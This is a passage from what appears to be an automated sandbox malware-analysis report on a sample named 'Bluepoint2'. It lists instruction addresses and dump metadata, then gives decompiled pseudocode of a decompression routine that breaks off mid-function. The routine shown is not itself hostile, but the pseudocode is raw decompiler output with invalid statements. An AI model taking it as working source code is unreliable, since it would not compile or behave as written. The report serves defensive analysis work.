                                                                                                                                    0x00406e23
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00406e29
                                                                                                                                    0x00406e2f
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00406e35
                                                                                                                                    0x00406e35
                                                                                                                                    0x00406e39
                                                                                                                                    0x00406e3c
                                                                                                                                    0x00406e3f
                                                                                                                                    0x00406e42
                                                                                                                                    0x00406e45
                                                                                                                                    0x00406e46
                                                                                                                                    0x00406e49
                                                                                                                                    0x00406e4b
                                                                                                                                    0x00406e51
                                                                                                                                    0x00406e54
                                                                                                                                    0x00406e57
                                                                                                                                    0x00406e5a
                                                                                                                                    0x00406e5d
                                                                                                                                    0x00406e60
                                                                                                                                    0x00406e63
                                                                                                                                    0x00406e7f
                                                                                                                                    0x00406e82
                                                                                                                                    0x00406e85
                                                                                                                                    0x00406e88
                                                                                                                                    0x00406e8f
                                                                                                                                    0x00406e93
                                                                                                                                    0x00406e95
                                                                                                                                    0x00406e99
                                                                                                                                    0x00406e65
                                                                                                                                    0x00406e65
                                                                                                                                    0x00406e69
                                                                                                                                    0x00406e71
                                                                                                                                    0x00406e76
                                                                                                                                    0x00406e78
                                                                                                                                    0x00406e7a
                                                                                                                                    0x00406e7a
                                                                                                                                    0x00406e9c
                                                                                                                                    0x00406ea3
                                                                                                                                    0x00406ea6
                                                                                                                                    0x00000000
                                                                                                                                    0x00406eac
                                                                                                                                    0x00000000
                                                                                                                                    0x00406eac
                                                                                                                                    0x00000000
                                                                                                                                    0x00406eb1
                                                                                                                                    0x00406eb1
                                                                                                                                    0x00406eb5
                                                                                                                                    0x00407575
                                                                                                                                    0x00000000
                                                                                                                                    0x00407575
                                                                                                                                    0x00406ebb
                                                                                                                                    0x00406ebe
                                                                                                                                    0x00406ec1
                                                                                                                                    0x00406ec5
                                                                                                                                    0x00406ec8
                                                                                                                                    0x00406ece
                                                                                                                                    0x00406ed0
                                                                                                                                    0x00406ed0
                                                                                                                                    0x00406ed0
                                                                                                                                    0x00406ed3
                                                                                                                                    0x00406ed6
                                                                                                                                    0x00406ed6
                                                                                                                                    0x00406ed6
                                                                                                                                    0x00406edc
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00406ede
                                                                                                                                    0x00406ee1
                                                                                                                                    0x00406ee4
                                                                                                                                    0x00406ee7
                                                                                                                                    0x00406eea
                                                                                                                                    0x00406eed
                                                                                                                                    0x00406ef0
                                                                                                                                    0x00406ef3
                                                                                                                                    0x00406ef6
                                                                                                                                    0x00406ef9
                                                                                                                                    0x00406efc
                                                                                                                                    0x00406f14
                                                                                                                                    0x00406f17
                                                                                                                                    0x00406f1a
                                                                                                                                    0x00406f1d
                                                                                                                                    0x00406f1d
                                                                                                                                    0x00406f20
                                                                                                                                    0x00406f24
                                                                                                                                    0x00406f26
                                                                                                                                    0x00406efe
                                                                                                                                    0x00406efe
                                                                                                                                    0x00406f06
                                                                                                                                    0x00406f0b
                                                                                                                                    0x00406f0d
                                                                                                                                    0x00406f0f
                                                                                                                                    0x00406f0f
                                                                                                                                    0x00406f29
                                                                                                                                    0x00406f30
                                                                                                                                    0x00406f33
                                                                                                                                    0x00000000
                                                                                                                                    0x00406f35
                                                                                                                                    0x00000000
                                                                                                                                    0x00406f35
                                                                                                                                    0x00406f33
                                                                                                                                    0x00406f3a
                                                                                                                                    0x00406f3a
                                                                                                                                    0x00406f3a
                                                                                                                                    0x00406f3a
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00406f75
                                                                                                                                    0x00406f75
                                                                                                                                    0x00406f79
                                                                                                                                    0x00407581
                                                                                                                                    0x00000000
                                                                                                                                    0x00407581
                                                                                                                                    0x00406f7f
                                                                                                                                    0x00406f82
                                                                                                                                    0x00406f85
                                                                                                                                    0x00406f89
                                                                                                                                    0x00406f8c
                                                                                                                                    0x00406f92
                                                                                                                                    0x00406f94
                                                                                                                                    0x00406f94
                                                                                                                                    0x00406f94
                                                                                                                                    0x00406f97
                                                                                                                                    0x00406f9a
                                                                                                                                    0x00406f9a
                                                                                                                                    0x00406fa0
                                                                                                                                    0x00406f3e
                                                                                                                                    0x00406f3e
                                                                                                                                    0x00406f41
                                                                                                                                    0x00000000
                                                                                                                                    0x00406f41
                                                                                                                                    0x00406fa2
                                                                                                                                    0x00406fa2
                                                                                                                                    0x00406fa5
                                                                                                                                    0x00406fa8
                                                                                                                                    0x00406fab
                                                                                                                                    0x00406fae
                                                                                                                                    0x00406fb1
                                                                                                                                    0x00406fb4
                                                                                                                                    0x00406fb7
                                                                                                                                    0x00406fba
                                                                                                                                    0x00406fbd
                                                                                                                                    0x00406fc0
                                                                                                                                    0x00406fd8
                                                                                                                                    0x00406fdb
                                                                                                                                    0x00406fde
                                                                                                                                    0x00406fe1
                                                                                                                                    0x00406fe1
                                                                                                                                    0x00406fe4
                                                                                                                                    0x00406fe8
                                                                                                                                    0x00406fea
                                                                                                                                    0x00406fc2
                                                                                                                                    0x00406fc2
                                                                                                                                    0x00406fca
                                                                                                                                    0x00406fcf
                                                                                                                                    0x00406fd1
                                                                                                                                    0x00406fd3
                                                                                                                                    0x00406fd3
                                                                                                                                    0x00406fed
                                                                                                                                    0x00406ff4
                                                                                                                                    0x00406ff7
                                                                                                                                    0x00000000
                                                                                                                                    0x00406ff9
                                                                                                                                    0x00000000
                                                                                                                                    0x00406ff9
                                                                                                                                    0x00000000
                                                                                                                                    0x00407286
                                                                                                                                    0x00407286
                                                                                                                                    0x0040728a
                                                                                                                                    0x004075b1
                                                                                                                                    0x00000000
                                                                                                                                    0x004075b1
                                                                                                                                    0x00407290
                                                                                                                                    0x00407293
                                                                                                                                    0x00407296
                                                                                                                                    0x0040729a
                                                                                                                                    0x0040729d
                                                                                                                                    0x004072a3
                                                                                                                                    0x004072a5
                                                                                                                                    0x004072a5
                                                                                                                                    0x004072a5
                                                                                                                                    0x004072a8
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00407056
                                                                                                                                    0x00407056
                                                                                                                                    0x00407059
                                                                                                                                    0x004073cb
                                                                                                                                    0x004073cb
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00407452
                                                                                                                                    0x00407456
                                                                                                                                    0x00407474
                                                                                                                                    0x00407474
                                                                                                                                    0x00407474
                                                                                                                                    0x0040747b
                                                                                                                                    0x00407482
                                                                                                                                    0x00000000
                                                                                                                                    0x00407482
                                                                                                                                    0x00407458
                                                                                                                                    0x0040745b
                                                                                                                                    0x0040745e
                                                                                                                                    0x00407461
                                                                                                                                    0x00407468
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00407543
                                                                                                                                    0x00407546
                                                                                                                                    0x00407447
                                                                                                                                    0x00407447
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x0040717d
                                                                                                                                    0x0040717f
                                                                                                                                    0x00407186
                                                                                                                                    0x00407187
                                                                                                                                    0x00407189
                                                                                                                                    0x0040718c
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00407194
                                                                                                                                    0x00407197
                                                                                                                                    0x0040719a
                                                                                                                                    0x0040719c
                                                                                                                                    0x0040719e
                                                                                                                                    0x0040719e
                                                                                                                                    0x0040719f
                                                                                                                                    0x004071a2
                                                                                                                                    0x004071a9
                                                                                                                                    0x004071ac
                                                                                                                                    0x004071ba
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x0040749f
                                                                                                                                    0x0040749f
                                                                                                                                    0x004074a3
                                                                                                                                    0x004075db
                                                                                                                                    0x00000000
                                                                                                                                    0x004075db
                                                                                                                                    0x004074a9
                                                                                                                                    0x004074ac
                                                                                                                                    0x004074af
                                                                                                                                    0x004074b3
                                                                                                                                    0x004074b6
                                                                                                                                    0x004074bc
                                                                                                                                    0x004074be
                                                                                                                                    0x004074be
                                                                                                                                    0x004074be
                                                                                                                                    0x004074c1
                                                                                                                                    0x004074c4
                                                                                                                                    0x004074c4
                                                                                                                                    0x004074c4
                                                                                                                                    0x004074c4
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x004071c2
                                                                                                                                    0x004071c5
                                                                                                                                    0x004071fb
                                                                                                                                    0x0040732b
                                                                                                                                    0x0040732b
                                                                                                                                    0x0040732b
                                                                                                                                    0x0040732b
                                                                                                                                    0x0040732e
                                                                                                                                    0x0040732e
                                                                                                                                    0x00407331
                                                                                                                                    0x00407333
                                                                                                                                    0x004075bd
                                                                                                                                    0x00000000
                                                                                                                                    0x004075bd
                                                                                                                                    0x00407339
                                                                                                                                    0x0040733c
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00407342
                                                                                                                                    0x00407346
                                                                                                                                    0x00407349
                                                                                                                                    0x00407349
                                                                                                                                    0x00407349
                                                                                                                                    0x00000000
                                                                                                                                    0x00407349
                                                                                                                                    0x004071c7
                                                                                                                                    0x004071c9
                                                                                                                                    0x004071cb
                                                                                                                                    0x004071cd
                                                                                                                                    0x004071d0
                                                                                                                                    0x004071d1
                                                                                                                                    0x004071d3
                                                                                                                                    0x004071d5
                                                                                                                                    0x004071d8
                                                                                                                                    0x004071db
                                                                                                                                    0x004071f1
                                                                                                                                    0x004071f6
                                                                                                                                    0x0040722e
                                                                                                                                    0x0040722e
                                                                                                                                    0x00407232
                                                                                                                                    0x0040725e
                                                                                                                                    0x00407260
                                                                                                                                    0x00407267
                                                                                                                                    0x0040726a
                                                                                                                                    0x0040726d
                                                                                                                                    0x0040726d
                                                                                                                                    0x00407272
                                                                                                                                    0x00407272
                                                                                                                                    0x00407274
                                                                                                                                    0x00407277
                                                                                                                                    0x0040727e
                                                                                                                                    0x00407281
                                                                                                                                    0x004072ae
                                                                                                                                    0x004072ae
                                                                                                                                    0x004072b1
                                                                                                                                    0x004072b4
                                                                                                                                    0x00407328
                                                                                                                                    0x00407328
                                                                                                                                    0x00407328
                                                                                                                                    0x00000000
                                                                                                                                    0x00407328
                                                                                                                                    0x004072b6
                                                                                                                                    0x004072bc
                                                                                                                                    0x004072bf
                                                                                                                                    0x004072c2
                                                                                                                                    0x004072c5
                                                                                                                                    0x004072c8
                                                                                                                                    0x004072cb
                                                                                                                                    0x004072ce
                                                                                                                                    0x004072d1
                                                                                                                                    0x004072d4
                                                                                                                                    0x004072d7
                                                                                                                                    0x004072f0
                                                                                                                                    0x004072f2
                                                                                                                                    0x004072f5
                                                                                                                                    0x004072f6
                                                                                                                                    0x004072f9
                                                                                                                                    0x004072fb
                                                                                                                                    0x004072fe
                                                                                                                                    0x00407300
                                                                                                                                    0x00407302
                                                                                                                                    0x00407305
                                                                                                                                    0x00407307
                                                                                                                                    0x0040730a
                                                                                                                                    0x0040730e
                                                                                                                                    0x00407310
                                                                                                                                    0x00407310
                                                                                                                                    0x00407311
                                                                                                                                    0x00407314
                                                                                                                                    0x00407317
                                                                                                                                    0x004072d9
                                                                                                                                    0x004072d9
                                                                                                                                    0x004072e1
                                                                                                                                    0x004072e6
                                                                                                                                    0x004072e8
                                                                                                                                    0x004072eb
                                                                                                                                    0x004072eb
                                                                                                                                    0x0040731a
                                                                                                                                    0x00407321
                                                                                                                                    0x004072ab
                                                                                                                                    0x004072ab
                                                                                                                                    0x004072ab
                                                                                                                                    0x004072ab
                                                                                                                                    0x00000000
                                                                                                                                    0x00407323
                                                                                                                                    0x00000000
                                                                                                                                    0x00407323
                                                                                                                                    0x00407321
                                                                                                                                    0x00407234
                                                                                                                                    0x00407237
                                                                                                                                    0x00407239
                                                                                                                                    0x0040723c
                                                                                                                                    0x0040723f
                                                                                                                                    0x00407242
                                                                                                                                    0x00407244
                                                                                                                                    0x00407247
                                                                                                                                    0x0040724a
                                                                                                                                    0x0040724a
                                                                                                                                    0x0040724d
                                                                                                                                    0x0040724d
                                                                                                                                    0x00407250
                                                                                                                                    0x00407257
                                                                                                                                    0x0040722b
                                                                                                                                    0x0040722b
                                                                                                                                    0x0040722b
                                                                                                                                    0x0040722b
                                                                                                                                    0x00000000
                                                                                                                                    0x00407259
                                                                                                                                    0x00000000
                                                                                                                                    0x00407259
                                                                                                                                    0x00407257
                                                                                                                                    0x004071dd
                                                                                                                                    0x004071e0
                                                                                                                                    0x004071e2
                                                                                                                                    0x004071e5
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00406f44
                                                                                                                                    0x00406f44
                                                                                                                                    0x00406f48
                                                                                                                                    0x0040758d
                                                                                                                                    0x00000000
                                                                                                                                    0x0040758d
                                                                                                                                    0x00406f4e
                                                                                                                                    0x00406f51
                                                                                                                                    0x00406f54
                                                                                                                                    0x00406f57
                                                                                                                                    0x00406f5a
                                                                                                                                    0x00406f5d
                                                                                                                                    0x00406f60
                                                                                                                                    0x00406f62
                                                                                                                                    0x00406f65
                                                                                                                                    0x00406f68
                                                                                                                                    0x00406f6b
                                                                                                                                    0x00406f6d
                                                                                                                                    0x00406f6d
                                                                                                                                    0x00406f6d
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x004070cf
                                                                                                                                    0x004070cf
                                                                                                                                    0x004070d3
                                                                                                                                    0x00407599
                                                                                                                                    0x00000000
                                                                                                                                    0x00407599
                                                                                                                                    0x004070d9
                                                                                                                                    0x004070dc
                                                                                                                                    0x004070df
                                                                                                                                    0x004070e2
                                                                                                                                    0x004070e4
                                                                                                                                    0x004070e4
                                                                                                                                    0x004070e4
                                                                                                                                    0x004070e7
                                                                                                                                    0x004070ea
                                                                                                                                    0x004070ed
                                                                                                                                    0x004070f0
                                                                                                                                    0x004070f3
                                                                                                                                    0x004070f6
                                                                                                                                    0x004070f7
                                                                                                                                    0x004070f9
                                                                                                                                    0x004070f9
                                                                                                                                    0x004070f9
                                                                                                                                    0x004070fc
                                                                                                                                    0x004070ff
                                                                                                                                    0x00407102
                                                                                                                                    0x00407105
                                                                                                                                    0x00407105
                                                                                                                                    0x00407105
                                                                                                                                    0x00407108
                                                                                                                                    0x0040710a
                                                                                                                                    0x0040710a
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x0040734c
                                                                                                                                    0x0040734c
                                                                                                                                    0x0040734c
                                                                                                                                    0x00407350
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00407356
                                                                                                                                    0x00407359
                                                                                                                                    0x0040735c
                                                                                                                                    0x0040735f
                                                                                                                                    0x00407361
                                                                                                                                    0x00407361
                                                                                                                                    0x00407361
                                                                                                                                    0x00407364
                                                                                                                                    0x00407367
                                                                                                                                    0x0040736a
                                                                                                                                    0x0040736d
                                                                                                                                    0x00407370
                                                                                                                                    0x00407373
                                                                                                                                    0x00407374
                                                                                                                                    0x00407376
                                                                                                                                    0x00407376
                                                                                                                                    0x00407376
                                                                                                                                    0x00407379
                                                                                                                                    0x0040737c
                                                                                                                                    0x0040737f
                                                                                                                                    0x00407382
                                                                                                                                    0x00407385
                                                                                                                                    0x00407389
                                                                                                                                    0x0040738b
                                                                                                                                    0x0040738e
                                                                                                                                    0x00000000
                                                                                                                                    0x00407390
                                                                                                                                    0x0040710d
                                                                                                                                    0x0040710d
                                                                                                                                    0x00000000
                                                                                                                                    0x0040710d
                                                                                                                                    0x0040738e
                                                                                                                                    0x004075c3
                                                                                                                                    0x004075e5
                                                                                                                                    0x004075eb
                                                                                                                                    0x004075ed
                                                                                                                                    0x004075f4
                                                                                                                                    0x004075f6
                                                                                                                                    0x004075fd
                                                                                                                                    0x00407601
                                                                                                                                    0x00000000
                                                                                                                                    0x00406bf2
                                                                                                                                    0x004075fa
                                                                                                                                    0x004075fa
                                                                                                                                    0x00000000
                                                                                                                                    0x004075fa
                                                                                                                                    0x00407447
                                                                                                                                    0x004074cd
                                                                                                                                    0x004074d3
                                                                                                                                    0x004074d6
                                                                                                                                    0x004074d9
                                                                                                                                    0x004074dc
                                                                                                                                    0x004074df
                                                                                                                                    0x004074e2
                                                                                                                                    0x004074e5
                                                                                                                                    0x004074e8
                                                                                                                                    0x004074ee
                                                                                                                                    0x00407507
                                                                                                                                    0x0040750a
                                                                                                                                    0x0040750d
                                                                                                                                    0x00407510
                                                                                                                                    0x00407514
                                                                                                                                    0x00407516
                                                                                                                                    0x00407517
                                                                                                                                    0x0040751a
                                                                                                                                    0x004074f0
                                                                                                                                    0x004074f0
                                                                                                                                    0x004074f8
                                                                                                                                    0x004074fd
                                                                                                                                    0x004074ff
                                                                                                                                    0x00407502
                                                                                                                                    0x00407502
                                                                                                                                    0x00407524
                                                                                                                                    0x00000000
                                                                                                                                    0x00407526
                                                                                                                                    0x00000000
                                                                                                                                    0x00407526
                                                                                                                                    0x00407524
                                                                                                                                    0x00000000
                                                                                                                                    0x00407399

                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.84104538123.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.84104491889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84104632043.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84104686670.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84104898038.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84104954758.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84105014701.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84105061190.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84105117723.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_Bluepoint2.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 97748a737734167d5846b9d8dd4738ada3f75d0b833fdafa89234df63502b4a5
                                                                                                                                    • Instruction ID: d49815ad38d406b3cd0a1a90ea7be1526168d9e39684835ffa6a026ef1ef4849
                                                                                                                                    • Opcode Fuzzy Hash: 97748a737734167d5846b9d8dd4738ada3f75d0b833fdafa89234df63502b4a5
                                                                                                                                    • Instruction Fuzzy Hash: 91913270D04228DBEF28CF98C8547ADBBB1FF44305F14816AD856BB281D778A986DF45
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 004070AB Relevance: 5.2, APIs: 4, Instructions: 205COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 98%
                                                                                                                                    			E004070AB() {
				unsigned short _t532;
				signed int _t533;
				void _t534;
				void* _t535;
				signed int _t536;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						L89:
						 *((intOrPtr*)(_t613 - 0x80)) = 0x15;
						 *(_t613 - 0x58) =  *(_t613 - 4) + 0xa68;
						L69:
						_t606 =  *(_t613 - 0x58);
						 *(_t613 - 0x84) = 0x12;
						L132:
						 *(_t613 - 0x54) = _t606;
						L133:
						_t532 =  *_t606;
						_t589 = _t532 & 0x0000ffff;
						_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
						if( *(_t613 - 0xc) >= _t565) {
							 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
							 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
							 *(_t613 - 0x40) = 1;
							_t533 = _t532 - (_t532 >> 5);
							 *_t606 = _t533;
						} else {
							 *(_t613 - 0x10) = _t565;
							 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
							 *_t606 = (0x800 - _t589 >> 5) + _t532;
						}
						if( *(_t613 - 0x10) >= 0x1000000) {
							L139:
							_t534 =  *(_t613 - 0x84);
							L140:
							 *(_t613 - 0x88) = _t534;
							goto L1;
						} else {
							L137:
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 5;
								goto L170;
							}
							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							goto L139;
						}
					} else {
						if( *(__ebp - 0x60) == 0) {
							L171:
							_t536 = _t535 | 0xffffffff;
							L172:
							return _t536;
						}
						__eax = 0;
						_t258 =  *(__ebp - 0x38) - 7 >= 0;
						0 | _t258 = _t258 + _t258 + 9;
						 *(__ebp - 0x38) = _t258 + _t258 + 9;
						L75:
						if( *(__ebp - 0x64) == 0) {
							 *(__ebp - 0x88) = 0x1b;
							L170:
							_t568 = 0x22;
							memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
							_t536 = 0;
							goto L172;
						}
						__eax =  *(__ebp - 0x14);
						__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
						if(__eax >=  *(__ebp - 0x74)) {
							__eax = __eax +  *(__ebp - 0x74);
						}
						__edx =  *(__ebp - 8);
						__cl =  *(__eax + __edx);
						__eax =  *(__ebp - 0x14);
						 *(__ebp - 0x5c) = __cl;
						 *(__eax + __edx) = __cl;
						__eax = __eax + 1;
						__edx = 0;
						_t274 = __eax %  *(__ebp - 0x74);
						__eax = __eax /  *(__ebp - 0x74);
						__edx = _t274;
						__eax =  *(__ebp - 0x68);
						 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
						 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
						_t283 = __ebp - 0x64;
						 *_t283 =  *(__ebp - 0x64) - 1;
						 *( *(__ebp - 0x68)) = __cl;
						L79:
						 *(__ebp - 0x14) = __edx;
						L80:
						 *(__ebp - 0x88) = 2;
					}
					L1:
					_t535 =  *(_t613 - 0x88);
					if(_t535 > 0x1c) {
						goto L171;
					}
					switch( *((intOrPtr*)(_t535 * 4 +  &M00407602))) {
						case 0:
							if( *(_t613 - 0x6c) == 0) {
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							_t535 =  *( *(_t613 - 0x70));
							if(_t535 > 0xe1) {
								goto L171;
							}
							_t539 = _t535 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t570);
							_push(9);
							_pop(_t571);
							_t609 = _t539 / _t570;
							_t541 = _t539 % _t570 & 0x000000ff;
							asm("cdq");
							_t604 = _t541 % _t571 & 0x000000ff;
							 *(_t613 - 0x3c) = _t604;
							 *(_t613 - 0x1c) = (1 << _t609) - 1;
							 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t541 / _t571) - 1;
							_t612 = (0x300 << _t604 + _t609) + 0x736;
							if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
								L10:
								if(_t612 == 0) {
									L12:
									 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
									goto L15;
								} else {
									goto L11;
								}
								do {
									L11:
									_t612 = _t612 - 1;
									 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
								} while (_t612 != 0);
								goto L12;
							}
							if( *(_t613 - 4) != 0) {
								GlobalFree( *(_t613 - 4));
							}
							_t535 = GlobalAlloc(0x40, 0x600); // executed
							 *(_t613 - 4) = _t535;
							if(_t535 == 0) {
								goto L171;
							} else {
								 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
								goto L10;
							}
						case 1:
							L13:
							__eflags =  *(_t613 - 0x6c);
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 1;
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							_t45 = _t613 - 0x48;
							 *_t45 =  *(_t613 - 0x48) + 1;
							__eflags =  *_t45;
							L15:
							if( *(_t613 - 0x48) < 4) {
								goto L13;
							}
							_t547 =  *(_t613 - 0x40);
							if(_t547 ==  *(_t613 - 0x74)) {
								L20:
								 *(_t613 - 0x48) = 5;
								 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
								goto L23;
							}
							 *(_t613 - 0x74) = _t547;
							if( *(_t613 - 8) != 0) {
								GlobalFree( *(_t613 - 8));
							}
							_t535 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
							 *(_t613 - 8) = _t535;
							if(_t535 == 0) {
								goto L171;
							} else {
								goto L20;
							}
						case 2:
							L24:
							_t554 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
							 *(_t613 - 0x84) = 6;
							 *(_t613 - 0x4c) = _t554;
							_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t554) * 2;
							goto L132;
						case 3:
							L21:
							__eflags =  *(_t613 - 0x6c);
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 3;
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							_t67 = _t613 - 0x70;
							 *_t67 =  &(( *(_t613 - 0x70))[1]);
							__eflags =  *_t67;
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							L23:
							 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
							if( *(_t613 - 0x48) != 0) {
								goto L21;
							}
							goto L24;
						case 4:
							goto L133;
						case 5:
							goto L137;
						case 6:
							__edx = 0;
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x34) = 1;
								 *(__ebp - 0x84) = 7;
								__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x5c) & 0x000000ff;
							__esi =  *(__ebp - 0x60);
							__cl = 8;
							__cl = 8 -  *(__ebp - 0x3c);
							__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
							__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
							__ecx =  *(__ebp - 0x3c);
							__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
							__ecx =  *(__ebp - 4);
							(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
							__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
							__eflags =  *(__ebp - 0x38) - 4;
							__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
							 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
							if( *(__ebp - 0x38) >= 4) {
								__eflags =  *(__ebp - 0x38) - 0xa;
								if( *(__ebp - 0x38) >= 0xa) {
									_t98 = __ebp - 0x38;
									 *_t98 =  *(__ebp - 0x38) - 6;
									__eflags =  *_t98;
								} else {
									 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
								}
							} else {
								 *(__ebp - 0x38) = 0;
							}
							__eflags =  *(__ebp - 0x34) - __edx;
							if( *(__ebp - 0x34) == __edx) {
								__ebx = 0;
								__ebx = 1;
								goto L61;
							} else {
								__eax =  *(__ebp - 0x14);
								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
								__eflags = __eax -  *(__ebp - 0x74);
								if(__eax >=  *(__ebp - 0x74)) {
									__eax = __eax +  *(__ebp - 0x74);
									__eflags = __eax;
								}
								__ecx =  *(__ebp - 8);
								__ebx = 0;
								__ebx = 1;
								__al =  *((intOrPtr*)(__eax + __ecx));
								 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
								goto L41;
							}
						case 7:
							__eflags =  *(__ebp - 0x40) - 1;
